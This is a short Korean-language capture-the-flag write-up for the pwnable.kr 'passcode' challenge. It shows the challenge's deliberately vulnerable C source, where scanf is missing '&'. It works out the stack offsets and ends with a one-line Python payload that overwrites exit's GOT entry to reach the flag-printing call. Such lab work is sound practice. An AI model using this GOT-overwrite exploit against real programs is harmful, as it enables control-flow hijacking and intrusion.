[Toddler's Bottle] passcode

긁적

#include <stdio.h>

#include <stdlib.h>

void login(){

int passcode1;

int passcode2;

printf("enter passcode1 : ");

scanf("%d", passcode1);

fflush(stdin);

// ha! mommy told me that 32bit is vulnerable to bruteforcing :)

printf("enter passcode2 : ");

        scanf("%d", passcode2);

printf("checking...\n");

if(passcode1==338150 && passcode2==13371337){

                printf("Login OK!\n");

                system("/bin/cat flag");

        }

        else{

                printf("Login Failed!\n");

exit(0);

        }

}

void welcome(){

char name[100];

printf("enter you name : ");

scanf("%100s", name);

printf("Welcome %s!\n", name);

}

int main(){

printf("Toddler's Secure Login System 1.0 beta.\n");

welcome();

login();

// something after login...

printf("Now I can safely trust you that you have credential :)\n");

return 0;

}

scanf할떄 & 안쓰다니,,,  열혈C안봤나

쨋든 저거때문에 overwrite 되여. 근데 뭘 overwrite시키지 하면서 어셈좀 봤는데

name 영역 :  ebp - 0xc ~ ebp - 0x70

passcode1 영역 : ebp - 0xc~ ebp - 0x10

name ~ passcode1 까지 거리 = 0x70 - 0x10 = 0x60 = 96

name에서 100까지 입력할수 있으니까

음

dummy [96 byte] + @GOT[4byte]

를 name에 넣고

passcode1 에 @GOT 덮을 주소를 넣으면 되겠네

GOT는 exit덮지 뭐 덮을 주소는 system("/bin/cat flag") 인걸로

ㄱㄱㄱㄱㄱㄱ

귀차느니 구하는건 다 생략 어렵지도 않고

---

(python -c 'print "A"*96 + "\x18\xa0\x04\x08"+"\n"+"134514147"+"\n"+"ABCD"+"\n"') | ./passcode 

---

끝